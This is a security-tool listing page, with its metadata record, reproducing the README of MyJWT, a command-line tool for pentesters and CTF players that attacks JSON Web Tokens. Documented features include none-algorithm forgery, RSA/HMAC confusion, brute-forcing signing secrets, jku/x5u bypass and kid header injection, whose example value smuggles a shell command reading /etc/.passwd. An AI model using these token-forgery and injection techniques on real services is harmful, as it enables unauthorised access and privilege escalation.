MyJWT - A Cli For Cracking, Testing Vulnerabilities On Json Web Token (JWT)

2021-01-17T11:30:00

Description

[![](https://1.bp.blogspot.com/-Slo-3BCqM04/X_u4XJ46ZII/AAAAAAAAU-s/yQRAPdLLQqUVjrTm60WJYHDw1jdqTu6dwCNcBGAsYHQ/w640-h384/jwt.jpg)](<https://1.bp.blogspot.com/-Slo-3BCqM04/X_u4XJ46ZII/AAAAAAAAU-s/yQRAPdLLQqUVjrTm60WJYHDw1jdqTu6dwCNcBGAsYHQ/s1000/jwt.jpg>) This cli is for pentesters, CTF players, or dev. You can modify your jwt, sign, inject ,etc... Check [Documentation](<https://myjwt.readthedocs.io> "Documentation" ) for more information. If you see problems or enhancement send an issue.I will respond as soon as possible. Enjoy :) **Documentation** Documentation is available at [http://myjwt.readthedocs.io](<https://myjwt.readthedocs.io> "http://myjwt.readthedocs.io" ) **Features** * copy new jwt to clipboard * user Interface (thanks [questionary](<https://github.com/tmbo/questionary> "questionary" )) * color output * modify jwt (header/Payload) * None Vulnerability * RSA/HMAC confusion * Sign a jwt with key * Brute Force to guess key * crack jwt with regex to guess key * kid injection * Jku Bypass * X5u Bypass **Installation** To install myjwt, simply use pip: pip install myjwt To run mywt from a docker image, run: docker run -it docker.pkg.github.com/mbouamama/myjwt/myjwt:latest myjwt # mount volume for wordlist docker run -v $(pwd)/wordlist:/home/wordlist/ -it docker.pkg.github.com/mbouamama/myjwt/myjwt:latest myjwt # On Windows docker run -v %CD%/wordlist:/home/wordlist/ -it docker.pkg.github.com/mbouamama/myjwt/myjwt:latest myjwt To install myjwt, on git: git clone https://github.com/mBouamama/MyJWT.git cd ./MyJWT pip install -r requirements.txt python MyJWT/myjwt_cli.py --help To install myjwt on BlackArch: pacman -S myjwt **Usage** $ myjwt --help Usage: myjwt [OPTIONS] JWT This cli is for pentesters, CTF players, or dev. You can modify your jwt, sign, inject ,etc... Full documentation is at http://myjwt.readthedocs.io. If you see problems or enhancement send an issue.I will respond as soon as possible. Enjoy :) All new jwt will be copy to the clipboard. Options: --version Show the version and exit. --full-payload TEXT New [payload](<https://www.kitploit.com/search/label/Payload> "payload" ) for your jwt.Json format Required. -h, --add-header TEXT Add a new key, value to your jwt header, if key is present old value will be replaced.Format: key=value. -p, --add-payload TEXT Add a new key, value to your jwt payload, if key is present old value will be replaced.Format: key=value. --sign TEXT Sign Your jwt with key given. --verify TEXT verify your key. -none, --none-vulnerability Check None Alg vulnerability. --hmac PATH Check RS/HMAC Alg vulnerability. --bruteforce PATH [Bruteforce](<https://www.kitploit.com/search/label/Bruteforce> "Bruteforce" ) to guess the secret used to sign the token. -c, --crack TEXT regex to iterate all string possibilities to guess the secret used to sign the token. --kid TEXT Kid [Injection](<https://www.kitploit.com/search/label/Injection> "Injection" ) sql --jku TEXT Jku Header to bypass authentication --x5u TEXT X5u Header to bypass authen tication --crt TEXT For x5cHeader, force crt file --key TEXT For jku or x5c Header, force private key to your key file --file TEXT For jku Header and x5u Header, force file name --print Print Decoded JWT -u, --url TEXT Url to send your jwt. -m, --method TEXT Method use for send request to url.(Default GET). -d, --data TEXT Data send to your url.Format: key=value. if value = MY_JWT value will be replace by new jwt. -c, --cookies TEXT [Cookies](<https://www.kitploit.com/search/label/Cookies> "Cookies" ) to send to your url.Format: key=value. if value = MY_JWT value will be replace by new jwt. --help Show this message and exit. **Modify JWT** Option | Type | Example | help ---|---|---|--- \--ful-payload | JSON | {"user": "admin"} | New payload for your jwt. -h, --add-header | key=value | user=admin | Add a new key, value to your jwt header, if key is present old value will be replaced. -p, --add-payload | key=value | user=admin | Add a new key, value to your jwt payload, if key is present old value will be replaced. **Check Your JWT (HS alg)** Option | Type | Example | help ---|---|---|--- \--sign | text | mysecretkey | Sign Your jwt with your key \--verify | text | mysecretkey | Verify your key. **Exploit** Option | Type | Example | help ---|---|---|--- -none, --none-vulnerability | Nothing | | Check None Alg vulnerability. \--hmac | PATH | ./public.pem | Check RS/HMAC Alg vulnerability, and sign your jwt with public key. \--bruteforce | PATH | ./wordlist/big.txt | Bruteforce to guess th secret used to sign the token. Use txt file with all password stored(1 by line) \--crack | REGEX | "[a-z]{4}" | regex to iterate all string possibilities to guess the secret used to sign the token. \--kid | text | "00; echo /etc/.passwd" | Kid Injection sql \--jku | text | MYPUBLICIP | Jku Header to bypass authentication, use --file if you want to change your jwks file name, and --key if you want to use your own private pem \--x5u | text | MYPUBLICIP | For jku or x5c Header, use --file if you want to change your jwks file name, and --key if you want to use your own private pem **Send your jwt** Option | Type | Example | help ---|---|---|--- -u, --url | url | <http://challenge01.root-me.org/web-serveur/ch59/admin> | Url to send your jwt. -m, --method | text | POST | Method use to send request to url.(Default: GET). -d, --data | key=value | secret=MY_JWT | Data send to your url.Format: key=value. if value = MY_JWT value will be replace by your new jwt. -c, --cookies | key=value | secret=MY_JWT | Cookies to send to your url.Format: key=value.if value = MY_JWT value will be replace by your new jwt. **Other** Option | Type | Example | help ---|---|---|--- \--crt | PATH | ./public.crt | For x5cHeader, force crt file \--key | PATH | ./private.pem | For jku or x5c Header, force private key to your key file \--file | text | myfile | For jku Header, force file name without .json extension \--print | Nothing | | Print Decoded JWT \--help | Nothing | | Show Helper message and exit. \--version | Nothing | | Show Myjwt version **Examples** * [Modify Your jwt](<https://github.com/mBouamama/MyJWT#modify-your-jwt> "Modify Your jwt" ) * [None Vulnerabilty Check](<https://github.com/mBouamama/MyJWT#none-vulnerability> "None Vulnerabilty Check" ) * [Sign Key](<https://github.com/mBouamama/MyJWT#sign-key> "Sign Key" ) * [Brute Force Signature](<https://github.com/mBouamama/MyJWT#brute-force> "Brute Force Signature" ) * [RSA/HMAC Confusion](<https://github.com/mBouamama/MyJWT#rsahmac-confusion> "RSA/HMAC Confusion" ) * [Kid Injection](<https://github.com/mBouamama/MyJWT#kid-injection> "Kid Injection" ) * [Send your new Jwt to url](<https://github.com/mBouamama/MyJWT#send-your-new-jwt-to-url> "Send your new Jwt to url" ) * [Jku Vulnerability](<https://github.com/mBouamama/MyJWT#jku-vulnerability> "Jku Vulnerability" ) * [X5u Vulnerability](<https://github.com/mBouamama/MyJWT#x5u-vulnerability> "X5u Vulnerability" ) **Modify your Jwt** **CLI** myjwt YOUR_JWT --add-payload "username=admin" --add-header "refresh=false" **Code** from myjwt.modify_jwt import add_header, change_payload from myjwt.utils import jwt_to_json, SIGNATURE, encode_jwt jwt_json = jwt_to_json(jwt) jwt_json = add_header(jwt_json, {"kid": "001"}) jwt_json = change_payload(jwt_json, {"username": "admin"}) jwt = encode_jwt(jwt_json) + "." + jwt_json[SIGNATURE] Full example here: [01-modify-jwt](<https://github.com/mBouamama/MyJWT/blob/master/examples/01-modify-jwt/modify-jwt.py> "01-modify-jwt" ) **None Vulnerability** **CLI** myjwt YOUR_JWT --none-vulnerability **CODE** from myjwt.utils import jwt_to_json, SIGNATURE, encode_jwt from myjwt.vulnerabilities import none_vulnerability jwt_json = jwt_to_json(jwt) jwt = none_vulnerability(encode_jwt(jwt_json) + "." + jwt_json[SIGNATURE]) Full example here: [02-none-vulnerability](<https://github.com/mBouamama/MyJWT/blob/master/examples/02-none-vulnerability/none-vulnerability.py> "02-none-vulnerability" ) **Sign Key** **CLI** myjwt YOUR_JWT --sign YOUR_KEY **CODE** from myjwt.modify_jwt import signature from myjwt.utils import jwt_to_json key = "test" jwt = signature(jwt_to_json(jwt), key) Full example here: [03-sign-key](<https://github.com/mBouamama/MyJWT/blob/master/examples/03-sign-key/sign-key.py> "03-sign-key" ) **Brute Force** **CLI** myjwt YOUR_JWT --bruteforce PATH **CODE** from myjwt.vulnerabilities import bruteforce_wordlist wordlist = "../../wordlist/common_pass.txt" key = bruteforce_wordlist(jwt, wordlist) Full example here: [04-brute-force](<https://github.com/mBouamama/MyJWT/blob/master/examples/04-brute-force/brute-force.py> "04-brute-force" ) **Crack** **CLI** myjwt YOUR_JWT --crack REGEX **RSA/HMAC Confusion** **CLI** myjwt YOUR_JWT --hmac FILE **CODE** from myjwt.vulnerabilities import confusion_rsa_hmac file = "public.pem" jwt = confusion_rsa_hmac(jwt, file) Full example here: [05-rsa-hmac-confusion](<https://github.com/mBouamama/MyJWT/blob/master/examples/05-rsa-hmac-confusion/rsa-hmac-confusion.py> "05-rsa-hmac-confusion" ) **Kid Injection** **CLI** myjwt YOUR_JWT --kid INJECTION **Code** from myjwt.modify_jwt import signature from myjwt.utils import jwt_to_json from myjwt.vulnerabilities import inject_sql_kid injection = "../../../../../../dev/null" sign = "" jwt = inject_sql_kid(jwt, injection) jwt = signature(jwt_to_json(jwt), sign) Full example here: [06-kid-injection](<https://github.com/mBouamama/MyJWT/blob/master/examples/06-kid-injection/kid-injection.py> "06-kid-injection" ) **Send your new Jwt to url** **CLI** myjwt YOUR_JWT -u YOUR_URL -c "jwt=MY_JWT" --non-vulnerability --add-payload "username=admin" **Jku Vulnerability** **CLI** myjwt YOUR_JWT --jku YOUR_URL **Code** from myjwt.vulnerabilities import jku_vulnerability new_jwt = jku_vulnerability(jwt=jwt, url="MYPUBLIC_IP") print(jwt) Full example here: [07-jku-bypass](<https://github.com/mBouamama/MyJWT/blob/master/examples/07-jku-bypass/jku-bypass.py> "07-jku-bypass" ) **X5U Vulnerability** **CLI** myjwt YOUR_JWT --x5u YOUR_URL **Code** from myjwt.vulnerabilities import x5u_vulnerability newJwt = x5u_vulnerability(jwt=jwt, url="MYPUBLIC_IP") print(jwt) Full example here: [08-x5u-bypass](<https://github.com/mBouamama/MyJWT/blob/master/examples/08-x5u-bypass/x5u-bypass.py> "08-x5u-bypass" ) **Download** Check github releases. Latest is available at <https://github.com/mBouamama/MyJWT/releases/latest> **Contribute** * Fork this repository or clone it * Create a new branch (feature, hotfix, etc...) * Make necessary changes and commit those changes * Check lint with `make flake8` * Check unit_test with `make test` * Send Pull Request I will check as Soon as Possible. **Change log** The log's become rather long. It moved to its own file. See [CHANGES](<https://github.com/mBouamama/MyJWT/blob/master/CHANGELOG.md> "CHANGES" ). **[Download MyJWT](<https://github.com/mBouamama/MyJWT> "Download MyJWT" )**

{"id": "KITPLOIT:6633342161631791813", "vendorId": null, "type": "kitploit", "bulletinFamily": "tools", "title": "MyJWT - A Cli For Cracking, Testing Vulnerabilities On Json Web Token (JWT)", "description": "[![](https://1.bp.blogspot.com/-Slo-3BCqM04/X_u4XJ46ZII/AAAAAAAAU-s/yQRAPdLLQqUVjrTm60WJYHDw1jdqTu6dwCNcBGAsYHQ/w640-h384/jwt.jpg)](<https://1.bp.blogspot.com/-Slo-3BCqM04/X_u4XJ46ZII/AAAAAAAAU-s/yQRAPdLLQqUVjrTm60WJYHDw1jdqTu6dwCNcBGAsYHQ/s1000/jwt.jpg>)\n\n \n\n\nThis cli is for pentesters, CTF players, or dev. \nYou can modify your jwt, sign, inject ,etc... \nCheck [Documentation](<https://myjwt.readthedocs.io> \"Documentation\" ) for more information. \nIf you see problems or enhancement send an issue.I will respond as soon as possible. Enjoy :)\n\n \n\n\n**Documentation** \n\n\nDocumentation is available at [http://myjwt.readthedocs.io](<https://myjwt.readthedocs.io> \"http://myjwt.readthedocs.io\" )\n\n \n**Features** \n\n\n * copy new jwt to clipboard\n * user Interface (thanks [questionary](<https://github.com/tmbo/questionary> \"questionary\" ))\n * color output\n * modify jwt (header/Payload)\n * None Vulnerability\n * RSA/HMAC confusion\n * Sign a jwt with key\n * Brute Force to guess key\n * crack jwt with regex to guess key\n * kid injection\n * Jku Bypass\n * X5u Bypass\n \n**Installation** \n\n\nTo install myjwt, simply use pip:\n \n \n pip install myjwt \n \n\nTo run mywt from a docker image, run:\n \n \n docker run -it docker.pkg.github.com/mbouamama/myjwt/myjwt:latest myjwt \n \n # mount volume for wordlist \n docker run -v $(pwd)/wordlist:/home/wordlist/ -it docker.pkg.github.com/mbouamama/myjwt/myjwt:latest myjwt \n # On Windows \n docker run -v %CD%/wordlist:/home/wordlist/ -it docker.pkg.github.com/mbouamama/myjwt/myjwt:latest myjwt \n \n\nTo install myjwt, on git:\n \n \n git clone https://github.com/mBouamama/MyJWT.git \n cd ./MyJWT \n pip install -r requirements.txt \n python MyJWT/myjwt_cli.py --help \n \n\nTo install myjwt on BlackArch:\n \n \n pacman -S myjwt\n\n \n**Usage** \n\n \n \n $ myjwt --help \n Usage: myjwt [OPTIONS] JWT \n \n This cli is for pentesters, CTF players, or dev. \n You can modify your jwt, sign, inject ,etc... \n Full documentation is at http://myjwt.readthedocs.io. \n If you see problems or enhancement send an issue.I will respond as soon as possible. \n Enjoy :) \n All new jwt will be copy to the clipboard. \n \n Options: \n --version Show the version and exit. \n --full-payload TEXT New [payload](<https://www.kitploit.com/search/label/Payload> \"payload\" ) for your jwt.Json format Required. \n -h, --add-header TEXT Add a new key, value to your jwt header, if key \n is present old value will be replaced.Format: \n key=value. \n \n -p, --add-payload TEXT Add a new key, value to your jwt payload, if \n key is present old value will be \n replaced.Format: key=value. \n \n --sign TEXT Sign Your jwt with key given. \n --verify TEXT verify your key. \n -none, --none-vulnerability Check None Alg vulnerability. \n --hmac PATH Check RS/HMAC Alg vulnerability. \n --bruteforce PATH [Bruteforce](<https://www.kitploit.com/search/label/Bruteforce> \"Bruteforce\" ) to guess the secret used to sign the \n token. \n \n -c, --crack TEXT regex to iterate all string possibilities to \n guess the secret used to sign the token. \n \n --kid TEXT Kid [Injection](<https://www.kitploit.com/search/label/Injection> \"Injection\" ) sql \n --jku TEXT Jku Header to bypass authentication \n --x5u TEXT X5u Header to bypass authen tication \n --crt TEXT For x5cHeader, force crt file \n --key TEXT For jku or x5c Header, force private key to \n your key file \n \n --file TEXT For jku Header and x5u Header, force file name \n --print Print Decoded JWT \n -u, --url TEXT Url to send your jwt. \n -m, --method TEXT Method use for send request to url.(Default \n GET). \n \n -d, --data TEXT Data send to your url.Format: key=value. if \n value = MY_JWT value will be replace by new \n jwt. \n \n -c, --cookies TEXT [Cookies](<https://www.kitploit.com/search/label/Cookies> \"Cookies\" ) to send to your url.Format: key=value. \n if value = MY_JWT value will be replace by new \n jwt. \n \n --help Show this message and exit.\n\n \n**Modify JWT** \nOption | Type | Example | help \n---|---|---|--- \n\\--ful-payload | JSON | {\"user\": \"admin\"} | New payload for your jwt. \n-h, --add-header | key=value | user=admin | Add a new key, value to your jwt header, if key is present old value will be replaced. \n-p, --add-payload | key=value | user=admin | Add a new key, value to your jwt payload, if key is present old value will be replaced. \n \n**Check Your JWT (HS alg)** \nOption | Type | Example | help \n---|---|---|--- \n\\--sign | text | mysecretkey | Sign Your jwt with your key \n\\--verify | text | mysecretkey | Verify your key. \n \n**Exploit** \nOption | Type | Example | help \n---|---|---|--- \n-none, --none-vulnerability | Nothing | | Check None Alg vulnerability. \n\\--hmac | PATH | ./public.pem | Check RS/HMAC Alg vulnerability, and sign your jwt with public key. \n\\--bruteforce | PATH | ./wordlist/big.txt | Bruteforce to guess th secret used to sign the token. Use txt file with all password stored(1 by line) \n\\--crack | REGEX | \"[a-z]{4}\" | regex to iterate all string possibilities to guess the secret used to sign the token. \n\\--kid | text | \"00; echo /etc/.passwd\" | Kid Injection sql \n\\--jku | text | MYPUBLICIP | Jku Header to bypass authentication, use --file if you want to change your jwks file name, and --key if you want to use your own private pem \n\\--x5u | text | MYPUBLICIP | For jku or x5c Header, use --file if you want to change your jwks file name, and --key if you want to use your own private pem \n \n**Send your jwt** \nOption | Type | Example | help \n---|---|---|--- \n-u, --url | url | <http://challenge01.root-me.org/web-serveur/ch59/admin> | Url to send your jwt. \n-m, --method | text | POST | Method use to send request to url.(Default: GET). \n-d, --data | key=value | secret=MY_JWT | Data send to your url.Format: key=value. if value = MY_JWT value will be replace by your new jwt. \n-c, --cookies | key=value | secret=MY_JWT | Cookies to send to your url.Format: key=value.if value = MY_JWT value will be replace by your new jwt. \n \n**Other** \nOption | Type | Example | help \n---|---|---|--- \n\\--crt | PATH | ./public.crt | For x5cHeader, force crt file \n\\--key | PATH | ./private.pem | For jku or x5c Header, force private key to your key file \n\\--file | text | myfile | For jku Header, force file name without .json extension \n\\--print | Nothing | | Print Decoded JWT \n\\--help | Nothing | | Show Helper message and exit. \n\\--version | Nothing | | Show Myjwt version \n \n**Examples** \n\n\n * [Modify Your jwt](<https://github.com/mBouamama/MyJWT#modify-your-jwt> \"Modify Your jwt\" )\n * [None Vulnerabilty Check](<https://github.com/mBouamama/MyJWT#none-vulnerability> \"None Vulnerabilty Check\" )\n * [Sign Key](<https://github.com/mBouamama/MyJWT#sign-key> \"Sign Key\" )\n * [Brute Force Signature](<https://github.com/mBouamama/MyJWT#brute-force> \"Brute Force Signature\" )\n * [RSA/HMAC Confusion](<https://github.com/mBouamama/MyJWT#rsahmac-confusion> \"RSA/HMAC Confusion\" )\n * [Kid Injection](<https://github.com/mBouamama/MyJWT#kid-injection> \"Kid Injection\" )\n * [Send your new Jwt to url](<https://github.com/mBouamama/MyJWT#send-your-new-jwt-to-url> \"Send your new Jwt to url\" )\n * [Jku Vulnerability](<https://github.com/mBouamama/MyJWT#jku-vulnerability> \"Jku Vulnerability\" )\n * [X5u Vulnerability](<https://github.com/mBouamama/MyJWT#x5u-vulnerability> \"X5u Vulnerability\" )\n \n**Modify your Jwt** \n \n**CLI** \n\n \n \n myjwt YOUR_JWT --add-payload \"username=admin\" --add-header \"refresh=false\" \n \n\n \n**Code** \n\n \n \n from myjwt.modify_jwt import add_header, change_payload \n from myjwt.utils import jwt_to_json, SIGNATURE, encode_jwt \n \n jwt_json = jwt_to_json(jwt) \n jwt_json = add_header(jwt_json, {\"kid\": \"001\"}) \n jwt_json = change_payload(jwt_json, {\"username\": \"admin\"}) \n jwt = encode_jwt(jwt_json) + \".\" + jwt_json[SIGNATURE] \n \n\nFull example here: [01-modify-jwt](<https://github.com/mBouamama/MyJWT/blob/master/examples/01-modify-jwt/modify-jwt.py> \"01-modify-jwt\" )\n\n \n**None Vulnerability** \n \n**CLI** \n\n \n \n myjwt YOUR_JWT --none-vulnerability \n \n\n \n**CODE** \n\n \n \n from myjwt.utils import jwt_to_json, SIGNATURE, encode_jwt \n from myjwt.vulnerabilities import none_vulnerability \n jwt_json = jwt_to_json(jwt) \n jwt = none_vulnerability(encode_jwt(jwt_json) + \".\" + jwt_json[SIGNATURE]) \n \n\nFull example here: [02-none-vulnerability](<https://github.com/mBouamama/MyJWT/blob/master/examples/02-none-vulnerability/none-vulnerability.py> \"02-none-vulnerability\" )\n\n \n**Sign Key** \n \n**CLI** \n\n \n \n myjwt YOUR_JWT --sign YOUR_KEY \n \n\n \n**CODE** \n\n \n \n from myjwt.modify_jwt import signature \n from myjwt.utils import jwt_to_json \n key = \"test\" \n jwt = signature(jwt_to_json(jwt), key) \n \n\nFull example here: [03-sign-key](<https://github.com/mBouamama/MyJWT/blob/master/examples/03-sign-key/sign-key.py> \"03-sign-key\" )\n\n \n**Brute Force** \n \n**CLI** \n\n \n \n myjwt YOUR_JWT --bruteforce PATH \n \n\n \n**CODE** \n\n \n \n from myjwt.vulnerabilities import bruteforce_wordlist \n wordlist = \"../../wordlist/common_pass.txt\" \n key = bruteforce_wordlist(jwt, wordlist) \n \n\nFull example here: [04-brute-force](<https://github.com/mBouamama/MyJWT/blob/master/examples/04-brute-force/brute-force.py> \"04-brute-force\" )\n\n \n**Crack** \n \n**CLI** \n\n \n \n myjwt YOUR_JWT --crack REGEX \n \n\n \n**RSA/HMAC Confusion** \n \n**CLI** \n\n \n \n myjwt YOUR_JWT --hmac FILE \n \n\n \n**CODE** \n\n \n \n from myjwt.vulnerabilities import confusion_rsa_hmac \n file = \"public.pem\" \n jwt = confusion_rsa_hmac(jwt, file) \n \n\nFull example here: [05-rsa-hmac-confusion](<https://github.com/mBouamama/MyJWT/blob/master/examples/05-rsa-hmac-confusion/rsa-hmac-confusion.py> \"05-rsa-hmac-confusion\" )\n\n \n**Kid Injection** \n \n**CLI** \n\n \n \n myjwt YOUR_JWT --kid INJECTION \n \n\n \n**Code** \n\n \n \n from myjwt.modify_jwt import signature \n from myjwt.utils import jwt_to_json \n from myjwt.vulnerabilities import inject_sql_kid \n \n injection = \"../../../../../../dev/null\" \n sign = \"\" \n jwt = inject_sql_kid(jwt, injection) \n jwt = signature(jwt_to_json(jwt), sign) \n \n\nFull example here: [06-kid-injection](<https://github.com/mBouamama/MyJWT/blob/master/examples/06-kid-injection/kid-injection.py> \"06-kid-injection\" )\n\n \n**Send your new Jwt to url** \n \n**CLI** \n\n \n \n myjwt YOUR_JWT -u YOUR_URL -c \"jwt=MY_JWT\" --non-vulnerability --add-payload \"username=admin\" \n \n\n \n**Jku Vulnerability** \n \n**CLI** \n\n \n \n myjwt YOUR_JWT --jku YOUR_URL \n \n\n \n**Code** \n\n \n \n from myjwt.vulnerabilities import jku_vulnerability \n new_jwt = jku_vulnerability(jwt=jwt, url=\"MYPUBLIC_IP\") \n print(jwt) \n \n\nFull example here: [07-jku-bypass](<https://github.com/mBouamama/MyJWT/blob/master/examples/07-jku-bypass/jku-bypass.py> \"07-jku-bypass\" )\n\n \n**X5U Vulnerability** \n \n**CLI** \n\n \n \n myjwt YOUR_JWT --x5u YOUR_URL \n \n\n \n**Code** \n\n \n \n from myjwt.vulnerabilities import x5u_vulnerability \n newJwt = x5u_vulnerability(jwt=jwt, url=\"MYPUBLIC_IP\") \n print(jwt) \n \n\nFull example here: [08-x5u-bypass](<https://github.com/mBouamama/MyJWT/blob/master/examples/08-x5u-bypass/x5u-bypass.py> \"08-x5u-bypass\" )\n\n \n**Download** \n\n\nCheck github releases. Latest is available at <https://github.com/mBouamama/MyJWT/releases/latest>\n\n \n**Contribute** \n\n\n * Fork this repository or clone it\n * Create a new branch (feature, hotfix, etc...)\n * Make necessary changes and commit those changes\n * Check lint with `make flake8`\n * Check unit_test with `make test`\n * Send Pull Request I will check as Soon as Possible.\n \n**Change log** \n\n\nThe log's become rather long. It moved to its own file.\n\nSee [CHANGES](<https://github.com/mBouamama/MyJWT/blob/master/CHANGELOG.md> \"CHANGES\" ).\n\n \n \n\n\n**[Download MyJWT](<https://github.com/mBouamama/MyJWT> \"Download MyJWT\" )**\n", "published": "2021-01-17T11:30:00", "modified": "2021-01-17T11:30:03", "cvss": {"score": 0.0, "vector": "NONE"}, "cvss2": {}, "cvss3": {}, "href": "http://www.kitploit.com/2021/01/myjwt-cli-for-cracking-testing.html", "reporter": "KitPloit", "references": ["https://github.com/mBouamama/MyJWT#jku-vulnerability", "https://github.com/mBouamama/MyJWT#rsahmac-confusion", "https://github.com/mBouamama/MyJWT#x5u-vulnerability", "https://github.com/mBouamama/MyJWT/blob/master/examples/01-modify-jwt/modify-jwt.py", "https://github.com/mBouamama/MyJWT#send-your-new-jwt-to-url", "https://github.com/mBouamama/MyJWT#sign-key", "https://github.com/mBouamama/MyJWT/blob/master/examples/03-sign-key/sign-key.py", "https://github.com/mBouamama/MyJWT/blob/master/examples/07-jku-bypass/jku-bypass.py", "https://github.com/mBouamama/MyJWT/blob/master/examples/05-rsa-hmac-confusion/rsa-hmac-confusion.py", "https://github.com/mBouamama/MyJWT#brute-force", "https://github.com/mBouamama/MyJWT#kid-injection", "https://github.com/mBouamama/MyJWT/blob/master/CHANGELOG.md", "https://github.com/mBouamama/MyJWT", "https://github.com/mBouamama/MyJWT#modify-your-jwt", "https://github.com/mBouamama/MyJWT/releases/latest", "https://github.com/mBouamama/MyJWT#none-vulnerability", "https://github.com/mBouamama/MyJWT/blob/master/examples/02-none-vulnerability/none-vulnerability.py", "https://github.com/tmbo/questionary", "https://github.com/mBouamama/MyJWT/blob/master/examples/04-brute-force/brute-force.py", "https://github.com/mBouamama/MyJWT/blob/master/examples/06-kid-injection/kid-injection.py", "https://github.com/mBouamama/MyJWT/blob/master/examples/08-x5u-bypass/x5u-bypass.py"], "cvelist": [], "immutableFields": [], "lastseen": "2022-04-07T12:02:18", "viewCount": 235, "enchantments": {"dependencies": {}, "score": {"value": -0.2, "vector": "NONE"}, "backreferences": {}, "exploitation": null, "vulnersScore": -0.2}, "_state": {"dependencies": 1659893093, "score": 1659842276}, "_internal": {"score_hash": "a8637f9dc2e68d2438825c78587e50e7"}, "toolHref": "https://github.com/mBouamama/MyJWT"}